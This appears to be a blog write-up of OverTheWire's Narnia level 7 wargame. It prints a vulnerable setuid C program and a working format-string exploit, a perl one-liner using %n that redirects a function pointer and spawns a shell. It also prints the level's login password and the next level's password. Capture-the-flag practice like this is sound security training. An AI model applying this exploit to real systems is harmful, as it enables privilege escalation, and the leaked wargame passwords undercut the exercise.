# Narnia wargame: Level 7


# ssh narnia7@narnia.labs.overthewire.org
narnia7@narnia.labs.overthewire.org's password:61686b69617a69706875

narnia7@melissa$ file /narnia/narnia7
/narnia/narnia7: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
narnia7@melissa$ cat /narnia/narnia7.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

int goodfunction();
int hackedfunction();

int vuln(const char *format){
        char buffer[128];
        int (*ptrf)();

        memset(buffer, 0, sizeof(buffer));
        printf("goodfunction() = %p\n", goodfunction);
        printf("hackedfunction() = %p\n\n", hackedfunction);

        ptrf = goodfunction;
        printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);

        printf("I guess you want to come to the hackedfunction...\n");
        sleep(2);
        ptrf = goodfunction;

        snprintf(buffer, sizeof buffer, format);

        return ptrf();
}

int main(int argc, char **argv){
        if (argc <= 1){
                fprintf(stderr, "Usage: %s \n", argv[0]);
                exit(-1);
        }
        exit(vuln(argv[1]));
}

int goodfunction(){
        printf("Welcome to the goodfunction, but i said the Hackedfunction..\n");
        fflush(stdout);

        return 0;
}

int hackedfunction(){
        printf("Way to go!!!!");
        fflush(stdout);
        system("/bin/sh");

        return 0;
}
narnia7@melissa$ /narnia/narnia7 `perl -e 'print "\x9c\xd6\xff\xff" . "%x%x%x%x%.134514310d%n"'`
goodfunction() = 0x804867b
hackedfunction() = 0x80486a1

before : ptrf() = 0x804867b (0xffffd69c)
I guess you want to come to the hackedfunction...
Way to go!!!!$ /usr/bin/whoami
narnia8
$ /bin/cat /etc/narnia_pass/narnia8
6d6f6874687570686f67

1 comment:

Anonymous said...

It would be awesome if you could explain how you arrived at the solution a little bit as well. For example, how you found to use 4 %x's and .134514310